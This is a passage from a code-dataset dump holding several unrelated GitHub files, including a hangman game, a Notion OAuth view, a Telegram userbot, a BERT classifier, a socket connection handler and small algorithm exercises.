1\nprint(ans)\n","repo_name":"kazu0716/programing_training","sub_path":"atcoder/ABC/324/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21477508683","text":"import random\nfrom hangman_words import word_list\nfrom hangman_art import stages, logo\nimport os\n\ndisplay = []\n\n# TODO-8\nlives = 6\n\n# TODO-1 - Randomly choose a word from the word_list and assign it to a variable called chosen_word.\n\n# TODO-2 - Ask the user to guess a letter and assign their answer to a variable called guess.\n# Make guess lowercase.\n\n# TODO-3 - Check if the letter the user guessed (guess) is one of the letters in the chosen_word.\n\n# TODO-4 - Create an empty List called display.\n# For each letter in the chosen_word, add a \"_\" to 'display'.\n# So if the chosen_word was 
\"apple\", display should be [\"_\", \"_\", \"_\", \"_\", \"_\"]\n# with 5 \"_\" representing each letter to guess\n\n# TODO-5 Loop through each position in the chosen_word;\n# If the letter at that position matches guess then\n# reveal that letter in the display at that position.\n# e.g If the user guessed \"p\" and the chosen word was\n# \"apple\", then display should be [\"_\", \"P\", \"P\", \"_\", \"_\"]\n\n# TODO-6: - Print 'display' and you should see the guessed letter in the correct position and every other letter replace with \"_\".\n# Hint - Don't worry about getting the user to guess the next letter. We'll tackle that in step 3.\n\n# TODO-7: - Use a while loop to let the user guess again.\n# The loop should only stop once the user has guessed all the letters in the chosen_word and 'display' has no more blanks (\"_\").\n# Then you can tell the user they've won.\n\n# TODO-8: - Create a variable called 'lives' to keep track of the number of lives left.\n# Set 'lives' to equal 6.\n\n# TODO-9: - If guess is not a letter in the chosen_word,\n# Then reduce 'lives' by 1.\n# If lives goes down to 0 then the game should stop and it should print \"You lose.\"\n\n# TODO-10: - print the ASCII art from 'stages' that corresponds\n# to the current number of 'lives' the user has remaining.\n\n# TODO-1\nchosen_word = random.choice(word_list).lower()\nword_length = len(chosen_word)\n\n\n# TODO-4\nfor _ in range(word_length):\n display.append(\"_\")\n\nprint(logo)\nprint(f\"the chosen word is: {chosen_word}\")\n\n\ndef guess_letter():\n global lives\n\n if not lives:\n # TODO-10\n print(stages[lives])\n print(\"You lose.\")\n lives -= 1\n return\n\n # TODO-2\n guess = input(\"Guess a letter from the word: \").lower()\n\n if guess.upper() in display:\n print(\"You already guessed this letter\")\n return\n\n # TODO-5\n for position in range(word_length):\n char = chosen_word[position]\n\n # TODO-3\n if guess == char:\n display[position] = char.upper()\n\n if guess not in chosen_word:\n # TODO-9\n print(\"That's not in the word. 
You lose a life.\")\n print(stages[lives])\n lives -= 1\n\n if \"_\" not in display:\n print(f\"{' '.join(display)}\")\n print(\"You win\")\n else:\n # TODO-6\n print(f\"{' '.join(display)}\")\n\n return lives\n\n\n# TODO-7\nwhile \"_\" in display and lives >= 0:\n guess_letter()\n","repo_name":"enriqueMota/day_seven_hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7810353127","text":"from django.urls import path\n\nfrom .views import ProductListView, ProductDetailView, ProductListCategoryView, ProductBySearchView, SearchView\n\nurlpatterns = [\n path('', ProductListView.as_view()),\n path('', ProductDetailView.as_view()),\n path('category/', ProductListCategoryView.as_view()),\n path('by/search', ProductBySearchView.as_view()),\n path('search/',SearchView.as_view() )\n\n]","repo_name":"yetian29/Ecommerce","sub_path":"apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39159284922","text":"\"\"\"\r\nAnd this first tutorial I'll show you 3\r\nways to solve the factorial problem\r\n\"\"\"\r\n\r\n\r\ndef fac(value):\r\n '''\r\n This uses simple recursion to \r\n solve it but theres a limit\r\n to how many times it can recur\r\n '''\r\n if value <= 1:\r\n return 1\r\n\r\n else:\r\n return value * fac(value - 1)\r\n\r\n\r\nprint('limits of facorial recursion Problem 1:')\r\nprint(fac(1))\r\nprint(fac(10))\r\nprint(fac(100))\r\n\r\n\r\ndef fac2(value, saved = None):\r\n '''\r\n Usually saving the data back into \r\n itself would be the solution, but \r\n since we only going back and looking \r\n at a value once this solution is only\r\n as fast as the first 1\r\n '''\r\n if saved is None:\r\n saved = dict()\r\n\r\n if value <= 1:\r\n return 1\r\n\r\n else:\r\n fact = value * (fac2(value-1, saved))\r\n saved[value] = fact\r\n return fact\r\n\r\nprint('\\n\\nlimits of more advance facorial recursion Problem 2:')\r\nprint(fac2(1))\r\nprint(fac2(10))\r\nprint(fac2(100))\r\n\r\ndef fac3(value):\r\n '''\r\n This doesn't use recursion\r\n while recursion is easy to \r\n use, it's not handy when\r\n going through a recursion call\r\n thousands of times. 
Your memormy\r\n in your pc or laptop wouldn't \r\n be able to handle it \r\n '''\r\n if value <= 0:\r\n return 1\r\n fact = 1\r\n for i in range(1, value +1):\r\n fact = fact * i\r\n\r\n return fact\r\nprint('\\n\\nlimits of dynimic solution to factorial Problem 3:')\r\nprint(fac3(1))\r\nprint(fac3(10))\r\nprint(fac3(100))\r\nprint(fac3(1000))\r\nprint(fac3(10000))","repo_name":"TylerEnglish/dynimic-project","sub_path":"Welcome/factorial_solutions.py","file_name":"factorial_solutions.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31634459172","text":"import numpy as np\nimport scipy\n\n\ndef estimate_rigid_transform(points_A, points_B):\n \"\"\"Estimate Transform.\n\n points_A : N x 3\n points_B : N x 3\n \"\"\"\n centroid_A = np.mean(points_A, axis=0)\n centroid_B = np.mean(points_B, axis=0)\n\n Am = points_A - centroid_A[None, :]\n Bm = points_B - centroid_B[None, :]\n R = estimate_rotation_transform(Am, Bm)\n t = -1 * np.matmul(R, centroid_A) + centroid_B\n RT = np.eye(4)\n RT[:3, :3] = R.T\n RT[:3, 3] = -1 * np.matmul(R.T, centroid_A) + centroid_B\n\n # pts = np.concatenate([points_A, points_A[:,2:]*0 + 1], axis=1)\n # temp = np.matmul(RT, pts.T) [0:3, :]\n # error1 = np.abs(np.matmul(Am, R) - Bm).sum()\n # error = np.abs(temp.T - points_B).sum()\n # breakpoint()\n return RT\n\n\ndef estimate_rotation_transform(points_A, points_B):\n \"\"\"Estimate rotation.\n\n Assumes the point sets are zero centered.\n\n points_A : N x 3\n points_B: N x 3\n \"\"\"\n R, sca = scipy.linalg.orthogonal_procrustes(\n points_A, points_B, check_finite=True)\n return R\n","repo_name":"google-research/google-research","sub_path":"human_object_interaction/oci/oci/utils/rigid_transform.py","file_name":"rigid_transform.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"2477694409","text":"import secrets\n\nfrom django.shortcuts import redirect, reverse\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\n\nimport requests\n\nfrom oauthlib.oauth2 import WebApplicationClient\n\nfrom .models import NotionAuthorization\n\nserver_url = \"http://localhost:8000\" # The URL of this server\nredirect_uri = f\"{server_url}/notion/redirect\"\n\nauthorization_base_url = 'https://api.notion.com/v1/oauth/authorize'\n\ntoken_url = 'https://api.notion.com/v1/oauth/token'\n\nSTATE_SESSION_KEY = \"notion_state\"\n\n@login_required\ndef notion_auth_start(request):\n client = WebApplicationClient(settings.NOTION_CLIENT_ID)\n\n state = generate_state()\n request.session[STATE_SESSION_KEY] = state\n\n authorize_request_url = client.prepare_request_uri(\n authorization_base_url, redirect_uri)\n return redirect(authorize_request_url)\n\n@login_required\ndef notion_redirect(request):\n\t# oauthlib needs the complete uri with host name \n url = request.get_full_path()\n\t\t\n client = WebApplicationClient(settings.NOTION_CLIENT_ID)\n state = request.session.pop(STATE_SESSION_KEY)\n client.parse_request_uri_response(url, state=state)\n \n\t# Creates the URL, headers, and request body for the token request\n token_request_params = client.prepare_token_request(token_url, url, redirect_uri)\n\n\t# Makes a request for the token, authenticated with the client ID and secret\n auth = requests.auth.HTTPBasicAuth(\n settings.NOTION_CLIENT_ID, 
settings.NOTION_CLIENT_SECRET)\n response = requests.post(\n token_request_params[0], headers=token_request_params[1], data=token_request_params[2], auth=auth)\n\n if response.ok:\n token_response = client.parse_request_body_response(response.text)\n\n authorization = NotionAuthorization.objects.create(\n user = request.user,\n access_token = token_response.get(\"access_token\"),\n bot_id = token_response.get(\"bot_id\"),\n duplicated_template_id = token_response.get(\"duplicated_template_id\", None),\n workspace_name = token_response.get(\"workspace_name\"),\n workspace_icon = token_response.get(\"workspace_icon\"),\n workspace_id = token_response.get(\"workspace_id\"),\n owner = token_response.get(\"owner\")\n )\n authorization.save()\n\n return HttpResponseRedirect(reverse('notion_demo:home'))\n\ndef generate_state():\n return secrets.token_urlsafe(8)","repo_name":"lgaud/oauth_tutorial","sub_path":"notion_oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11683670675","text":"import logging\nimport queue\nimport struct\nimport selectors\nimport traceback\nfrom socket import socket\nfrom threading import Event, Thread\n\nfrom src.NetProtocol.AwaitResponse import MessageEvent\nfrom src.NetProtocol.Request import Request\nfrom src.Utility.NetworkUtilities import json_decode\nfrom src.NetProtocol.Message import Message\n\n\n# Required headers in the JSON header\nREQUIRED_HEADERS = [\n \"byteorder\",\n \"content_length\",\n \"content_type\",\n \"content_encoding\",\n \"CSeq\"\n]\n\n\n# Handles setting up connections and monitoring all socket connections\nclass ConnectionMonitor(Thread):\n def __init__(self, termination_event: Event, selector, receive_queue):\n super().__init__()\n self.termination_event = termination_event\n self.selector = selector\n self.receive_queue = receive_queue\n self.connection_number = 1\n\n def run(self):\n try:\n while not self.termination_event.is_set():\n # logging.debug(f\"Checking selector.select\")\n events = self.selector.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n # A new connection\n self._accept_wrapper(key.fileobj)\n else:\n conn_handler = key.data\n try:\n conn_handler.process_events(mask)\n except Exception:\n logging.error(f\"Exception in message from/to {conn_handler.addr}\\n:{traceback.format_exc()}\")\n conn_handler.close()\n # Check for a socket still being monitored\n if not self.selector.get_map():\n break\n except KeyboardInterrupt:\n logging.info(\"Caught keyboard interrupt, exiting.\")\n finally:\n logging.debug(f\"Connection handler stopped.\")\n self.selector.close()\n self.termination_event.set()\n\n # Handle a new connection\n def _accept_wrapper(self, sock: socket):\n conn, addr = sock.accept()\n logging.info(f\"Accepted connection from {conn.getpeername()}\")\n conn.setblocking(False)\n conn_handler = ConnectionHandler(selector=self.selector, sock=conn, addr=conn.getpeername(),\n num=self.connection_number, receive_queue=self.receive_queue)\n self.connection_number += 1\n self.selector.register(conn, selectors.EVENT_READ | selectors.EVENT_WRITE, data=conn_handler)\n\n\n# Handles receiving and sending on a specific connection. 
Run on main server/client thread\n# based on https://realpython.com/python-sockets/#application-client-and-server\nclass ConnectionHandler(Thread):\n def __init__(self, selector: selectors.BaseSelector, sock: socket, addr, num, receive_queue: queue.Queue):\n super().__init__(name=\"ConnectionHandler\")\n self.selector = selector\n self.sock = sock\n self.addr = addr\n self.peer_name = f\"peer_{num}\"\n self.CSeq = -1 # Sequence number we use when sending messages, incremented each message\n self.peer = None # Is set to a NetworkNode after a successful handshake\n self._recv_buffer = b\"\"\n self._send_buffer = b\"\"\n self._current_recv_message = None\n # submit messages to the global receive queue\n self._receive_queue = receive_queue\n # each message handler gets own send queue\n self._send_queue = queue.Queue()\n # CSeq -> Event dict, events are set when the CSeq we are awaiting arrives\n self.await_list = dict()\n\n def process_events(self, mask):\n if mask & selectors.EVENT_READ:\n self._read_wrapper()\n if mask & selectors.EVENT_WRITE:\n self._write_wrapper()\n\n def _read_wrapper(self):\n self._read()\n\n if self._current_recv_message is None:\n #logging.debug(f\"started receiving new message\")\n self._current_recv_message = Message(handler=self)\n\n # could take multiple _read to process single message, so keep track of headers\n if self._current_recv_message.json_header_len is None:\n self._process_protoheader()\n\n if self._current_recv_message.json_header_len is not None:\n if self._current_recv_message.json_header is None:\n self._process_jsonheader()\n\n if self._current_recv_message.json_header:\n if self._current_recv_message.content is None:\n self._process_message()\n\n # read from socket to a buffer\n def _read(self):\n try:\n # Should be ready to read\n data = self.sock.recv(4096)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n # Empty message interpreted as socket closed\n logging.info(f\"Peer at {self.addr} closed.\")\n self.close()\n\n def _write_wrapper(self):\n if not self._send_buffer:\n if not self._send_queue.empty():\n self._send_buffer += self._send_queue.get()\n #else:\n # logging.info(\"Nothing more to write\")\n # self._set_selector_events_mask('r')\n\n self._write()\n\n # Send data in the send buffer\n def _write(self):\n if self._send_buffer:\n # logging.debug(f\"Sending {self._send_buffer!r} to {self.addr}\")\n try:\n # Should be ready to write\n sent = self.sock.send(self._send_buffer)\n\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n self._send_buffer = self._send_buffer[sent:]\n if sent and not self._send_buffer:\n # buffer is drained. 
The response has been sent.\n logging.debug(f\"Message has been sent\")\n\n\n # Process the fixed length header (2 byte, big endian), gives length of following JSON header\n def _process_protoheader(self):\n hdrlen = 2\n if len(self._recv_buffer) >= hdrlen:\n self._current_recv_message.json_header_len = struct.unpack(\">H\", self._recv_buffer[:hdrlen])[0]\n self._recv_buffer = self._recv_buffer[hdrlen:]\n\n # Process variable length json_header\n def _process_jsonheader(self):\n hdrlen = self._current_recv_message.json_header_len\n if len(self._recv_buffer) >= hdrlen:\n self._current_recv_message.json_header = json_decode(self._recv_buffer[:hdrlen], \"utf-8\")\n self._recv_buffer = self._recv_buffer[hdrlen:]\n for req_hdr in REQUIRED_HEADERS:\n if req_hdr not in self._current_recv_message.json_header:\n raise ValueError(f\"Missing required header '{req_hdr}'.\")\n # Make sure CSeq is correct on the message\n self._current_recv_message.CSeq = self._current_recv_message.json_header['CSeq']\n\n # Process message after reading the header\n def _process_message(self):\n hdr = self._current_recv_message.json_header\n content_len = hdr[\"content_length\"]\n # don't process now if we haven't received the whole message yet\n if not len(self._recv_buffer) >= content_len:\n return\n # get received content\n data = self._recv_buffer[:content_len]\n self._recv_buffer = self._recv_buffer[content_len:]\n\n if hdr[\"content_type\"] == \"text/json\":\n encoding = hdr[\"content_encoding\"]\n self._current_recv_message.content = Request(content=json_decode(data, encoding))\n logging.debug(f\"Received request {self._current_recv_message.content.request['action']} from {self.addr}\")\n else:\n # Binary or unknown content-type\n self._current_recv_message.content = data\n logging.debug(\n f\"Received {hdr['content_type']} \"\n f\"request from {self.addr}\"\n )\n self._receive_queue.put(self._current_recv_message)\n self._current_recv_message = None\n\n # enqueue a request, return CSeq\n def send_message(self, message: Message, is_response=False):\n message.conn_handler = self\n message.is_received = False\n # Don't change the CSeq if we are responding to a message\n if not is_response:\n self.CSeq += 1\n logging.debug(f\"CSeq for {self.addr} is now {self.CSeq}\")\n message.CSeq = self.CSeq\n logging.debug(f\"Enqueued{' response' if is_response else ''}: {message.content.request['action']} to {self.addr} with CSeq {message.CSeq}\")\n #self._set_selector_events_mask('rw')\n self._send_queue.put(message.get_serialized())\n\n # enqueue a request, returns a future to wait for a response. 
If yield_message is true, the message handler will\n # pass the message through this event rather than handle it itself\n def send_message_and_wait_response(self, message: Message, is_response=False, yield_message=False) -> MessageEvent:\n message.conn_handler = self\n message.is_received = False\n # Don't change the CSeq if we are responding to a message\n if not is_response:\n self.CSeq += 1\n logging.debug(f\"CSeq for {self.addr} is now {self.CSeq}\")\n message.CSeq = self.CSeq\n #self._set_selector_events_mask('rw')\n # Add the wait event before sending\n logging.debug(f\"Enqueued{' response' if is_response else ''}: {message.content.request['action']} to {self.addr} with wait on CSeq {message.CSeq}\")\n message_event = self._add_new_await(message.CSeq, yield_message)\n # Force a reserialize, fixes an edge case where we wait on a message with wrong CSeq sent\n self._send_queue.put(message.get_serialized(force_reserialize=True))\n return message_event\n\n # Add a new CSeq await to the list of waiting event objects\n def _add_new_await(self, CSeq, yield_message) -> MessageEvent:\n if CSeq in self.await_list:\n logging.error(f\"Already waiting for a response to this message...\")\n event = MessageEvent(yield_message)\n #logging.debug(f\"Adding await for CSeq {CSeq}\")\n self.await_list[CSeq] = event\n return event\n\n # Set selector to listen for events: mode is 'r', 'w', or 'rw'.\n def _set_selector_events_mask(self, mode):\n logging.debug(f\"Set selector to mode {mode}\")\n if mode == \"r\":\n events = selectors.EVENT_READ\n elif mode == \"w\":\n events = selectors.EVENT_WRITE\n elif mode == \"rw\":\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n else:\n raise ValueError(f\"Invalid events mask mode {mode!r}.\")\n self.selector.modify(self.sock, events, data=self)\n\n def close(self):\n logging.info(f\"Closing connection to {self.addr}\")\n if self.peer is not None:\n self.peer.is_active = False\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n logging.error(\n f\"Error: selector.unregister() exception for \"\n f\"{self.addr}: {e!r}\"\n )\n\n try:\n self.sock.close()\n except OSError as e:\n logging.error(f\"Error: socket.close() exception for {self.addr}: {e!r}\")\n finally:\n # Delete reference to socket object for garbage collection\n self.sock = None\n","repo_name":"JerritEic/ResourceMapping","sub_path":"src/NetProtocol/ConnectionHandler.py","file_name":"ConnectionHandler.py","file_ext":"py","file_size_in_byte":11644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28339655694","text":"from pyrogram import Client, filters, raw\nfrom plugins import r, admin\n\nimport time\n\n\n@Client.on_message(filters.private & filters.user(admin) & filters.command(\"status\"))\ndef get_info(c, m):\n c.send(\n raw.functions.messages.StartBot(\n bot=c.resolve_peer('SpamBot'),\n peer=c.resolve_peer('SpamBot'),\n random_id=c.rnd_id(),\n start_param='start'\n )\n )\n\n\n@Client.on_message(filters.user('SpamBot'))\ndef status(c, m):\n c.send_chat_action(chat_id=admin, action='typing')\n time.sleep(0.15)\n\n c.send_message(chat_id=admin, text=m.text)\n\n\n@Client.on_message(filters.private & filters.user(admin) & filters.command(\"info\"))\ndef show_info(c, m):\n chat_id = m.chat.id\n counter = 0\n\n for dialog in c.iter_dialogs():\n if dialog.chat.type in [\"supergroup\", \"group\"]:\n counter += 1\n\n message = f\"\"\"\n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n〽️اطلاعات ربات〽️\n\n🔘• تعداد گروه ها : {counter}\n🔘• تعداد کاربران : 
pass\n🔘• مدیران : admin \n➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖\n \"\"\"\n\n c.send_chat_action(chat_id, 'typing')\n time.sleep(0.15)\n\n c.send_message(chat_id=chat_id, text=message)\n","repo_name":"MGunner/BotCli","sub_path":"plugins/info_section.py","file_name":"info_section.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38648983852","text":"import re\n\ndef __strip_prefix(name):\n name = re.sub(r'\\A(mr|ms|mrs|dr|md|prof|miss|master) ','',name).strip()\n name = re.sub(r'\\A,','',name).strip()\n return name\n\ndef __strip_suffix(name):\n name = re.sub(r' (jr|sr|esq|dr|md|dds|mba|phd)\\Z','',name).strip()\n name = re.sub(r',\\Z','',name).strip()\n return name\n\ndef clean(name):\n \"\"\"Returns a tuple, (firstname,middlename,lastname,confidence) with best \n guesses for each name value and an indication of how confident the cleaning\n process was.\n \"\"\"\n name = str(name) # since pandas might pass in numbers as ints\n name = name.lower()\n name = re.sub(r'\\.', '', name).strip() # remove .'s\n name = re.sub(r'[\\s]+', ' ', name).strip() # remove multiple \\s\n\n while name != __strip_prefix(name):\n # remove prefixes\n name = __strip_prefix(name)\n while name != __strip_suffix(name):\n # remove suffixes\n name = __strip_suffix(name)\n\n # split name on surname prefix\n surname_prefix_found = False\n surname_prefixes = ['van','von','de','da','dos','del','la','el','al','der','bin','di','ben','abu','du','dal','della','mac','haj','ter','neder','ibn','ab','nic','ek','lund','beck','oz','berg','papa','hadj','bar','skog','bjorn','degli','holm']\n for surname_prefix in surname_prefixes:\n if re.match(r'\\A.*\\s('+surname_prefix+')\\s.*\\Z', name):\n name_re = re.search(r'\\A(.*)\\s(('+surname_prefix+')\\s.*)\\Z', name)\n values = (name_re.group(1),'',name_re.group(2), 0.5)\n surname_prefix_found = True\n break\n\n if surname_prefix_found == False:\n if re.match(r'\\A[^\\s]+\\Z', name):\n # first (no \\s)\n values = (name, None, None, 0.5)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s]+\\Z', name):\n # first + last (split on \\s)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), None, name_re.group(2), 1)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s][\\s][^\\s]+\\Z', name):\n # first + mi + last (split on mi)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s])[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), name_re.group(2), name_re.group(3), 1)\n elif re.match(r'\\A[^\\s]+[\\s][^\\s]+[\\s][^\\s]+\\Z', name):\n # first + middle + last (split on middle)\n name_re = re.search(r'\\A([^\\s]+)[\\s]([^\\s]+)[\\s]([^\\s]+)\\Z', name)\n values = (name_re.group(1), name_re.group(2), name_re.group(3), 1)\n else:\n # other\n values = (name, None, None, 0)\n return values\n","repo_name":"cwkchan/MOOC","sub_path":"names/clean_names.py","file_name":"clean_names.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41114239689","text":"import torch\nimport torch.nn as nn\nfrom pytorch_pretrained_bert import BertModel\n\n\nclass AbuseDetectNet(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.label_dim = config.label_dim\n self.bert_base = BertModel.from_pretrained(config.bert_model_name)\n self.num_hidden_features = config.num_hidden_features\n self.bert_hidden_size = self.bert_base.config.hidden_size\n self.bert_max_seq_length = 
self.bert_base.config.max_position_embeddings\n\n # compute number of features to classification layer\n features_dim = self.bert_hidden_size * self.num_hidden_features # concat last hidden layers\n self.cls_layer = nn.Linear(in_features=features_dim, out_features=self.label_dim)\n self.train_params = self.cls_layer.parameters()\n\n def forward(self, x, attention_mask):\n # switch bert model to eval mode (no fine tuning just features extraction)\n self.bert_base.eval()\n\n encoded_layers, _ = self.bert_base(x, attention_mask=attention_mask)\n feature_layers = encoded_layers[-self.num_hidden_features:]\n feature_tensor = torch.cat(feature_layers, dim=2) # concatenate on feature index\n first_token_tensor = feature_tensor[:, 0, :] # getting tensor with shape [batch, features]\n logits = self.cls_layer(first_token_tensor)\n\n return logits\n","repo_name":"ofrikleinfeld/AbusiveAdversarial","sub_path":"models_and_training/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16571387161","text":"import logging\n\nfrom . import Config, WebRequest\n\n\nclass Good:\n def __init__(self, root, shop_type):\n self.id = int(root['id'])\n self.p_id = int(root['p_id'])\n self.type = root['type']\n self.num = int(root['num'])\n self.price = int(root['price'])\n self.shop_type = shop_type\n\n @property\n def is_plant(self):\n return self.type == 'organisms'\n\n\nclass PurchaseItem:\n def __init__(self, good: Good, amount: int):\n self.good = good\n self.amount = amount\n\n\nclass Shop:\n def __init__(self, cfg: Config):\n self.cfg = cfg\n self.wr = WebRequest(cfg)\n self.type_list = [1, 2, 5, 3, 6]\n self.shop_name_list = [\"普通商店\", \"礼券商店\", \"荣誉商店\", \"金券商城\", \"VIP商城\"]\n\n def _refresh_shop(self, shop_type: int):\n body = [float(shop_type)]\n resp = self.wr.amf_post_retry(\n body, \"api.shop.getMerchandises\", \"/pvz/amf/\", \"获取商店信息\", except_retry=True\n )\n return resp\n\n def refresh_shop(self):\n import concurrent.futures\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n futures = []\n for t in self.type_list:\n futures.append(executor.submit(self._refresh_shop, t))\n concurrent.futures.wait(futures, return_when=concurrent.futures.ALL_COMPLETED)\n\n self.good_id2good: dict[int, Good] = {}\n self.shop_goods_list = []\n for shop_type, future in zip(self.type_list, futures):\n try:\n response = future.result()\n except Exception as e:\n logging.error(e)\n continue\n if response.status == 0:\n pass\n else:\n logging.error(\"获取商店信息失败\")\n raise NotImplementedError\n goods = response.body\n self.shop_goods_list.append([Good(good, shop_type) for good in goods])\n self.good_id2good.update(\n {int(good.id): Good(good, shop_type) for good in goods}\n )\n\n def buy(self, item_id: int, amount: int):\n body = [float(item_id), float(amount)]\n response = self.wr.amf_post_retry(body, \"api.shop.buy\", \"/pvz/amf/\", \"购买物品\")\n if response.status == 0:\n if response.body['status'] == 'success':\n return {\"success\": True, \"result\": response.body}\n return {\"success\": False, \"result\": response.body['status']}\n else:\n return {\"success\": False, \"result\": response.body.description}\n","repo_name":"bwnotfound/pypvzol","sub_path":"pypvz/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"16047735614","text":"from 
code_challenges.arrays.two_sum.two_sum import twoSum # type: ignore\nimport pytest\n\ndef test_two_sum():\n nums = [2,7,11,15]\n target = 9\n actual = twoSum(nums, target)\n expected = [1,0]\n assert actual == expected\n\n\ndef test_two_sum_two():\n nums = [3,2,4]\n target = 6\n actual = twoSum(nums, target)\n expected = [2,1]\n assert actual == expected\n\n\ndef test_two_sum_three():\n nums = [3,3]\n target = 6\n actual = twoSum(nums, target)\n expected = [1,0]\n assert actual == expected","repo_name":"sarastrasner/daily-code-challenges","sub_path":"python/tests/test_two_sum.py","file_name":"test_two_sum.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73409321606","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nfrom skimage import io, transform, morphology\n#from tensorflow.keras import Model, layers\nfrom model import dice, dice_loss, unet_2d_b, denseud_byb_v2\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.utils import CustomObjectScope\n\n#TestDir = '../sample/TestData'\n#LabelDir = '../sample/TestLabel'\nTestDir = '../crop/testdata'\nLabelDir = '../crop/testlabel'\n\nsamples = os.listdir(TestDir)\npre_list = ['ac2', 'p4', 'p3', 'p2']\n\nwith CustomObjectScope({'dice': dice, 'dice_loss':dice_loss}):\n #mymodel = load_model('models/denseud_sum_v3.hdf5')\n mymodel = unet_2d_b(pretrained_weights='models/unet_spac_crop.h5')\n \n #n5 = mymodel.get_layer('')\n \n for p in pre_list:\n if not os.path.exists(p):\n os.mkdir(p)\n if not os.path.exists('gt'):\n os.mkdir('gt')\n if not os.path.exists('edge'):\n os.mkdir('edge')\n \n for sample in samples:\n print(sample)\n arr = np.load(os.path.join(TestDir, sample))\n lab = np.load(os.path.join(LabelDir, sample))\n outname = sample.split('.')[0]+'.png'\n arr = arr/1000\n arr[arr>1]=1\n arr[arr<-1]=-1\n \n arr = transform.resize(arr, [256,256], order=0)\n lab = transform.resize(lab, [256,256], order=0)\n #io.imsave(os.path.join('img', outname),(arr+1)/2)\n '''\n lab_d = morphology.dilation(lab, selem=morphology.square(7))\n lab_e = morphology.erosion(lab, selem=morphology.square(7))\n edge = lab_d - lab_e\n \n io.imsave(os.path.join('edge', outname),edge)\n '''\n arr = arr[np.newaxis,:,:,np.newaxis]\n io.imsave(os.path.join('crop_gt', outname),lab)\n res = mymodel.predict_on_batch(arr)\n #for i in range(3):\n # io.imsave(os.path.join(pre_list[i], outname), res[i][0, :, :, 0])\n io.imsave(os.path.join('crop', outname), res[0][0, :, :, 0])\n #results = mymodel.predict_generator(tval_gen,438,verbose=1)\n #saveResult(\"cropdata/ValPredict\", 'cropdata/ValData',results)\n #print(mymodel.layers[1].get_weights())","repo_name":"acc-L/Morphological-constrained-Unet-for-NB-segmentation","sub_path":"saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21448394885","text":"\"\"\"maximise sum at hackerrank.com\r\n\"\"\"\r\n\"\"\"\r\nProblem statement\r\n\r\nGet maximum of sum of subarray modulo M where M is given.\r\nSubarray is a continuous subset of array elements.\r\n\r\nSample Input\r\n\r\n1\r\n5 7\r\n3 3 9 9 5\r\n\r\nSample Output\r\n\r\n6\r\n\r\nExplanation\r\n\r\nMax Possible Sum taking Modulo 7 is 6 , and we can get 6 by\r\nadding first and second element of the array\r\n\"\"\"\r\n\r\ncases = int(raw_input())\r\n\r\nfor _ in range(cases) :\r\n\r\n size, modulo = map(int, 
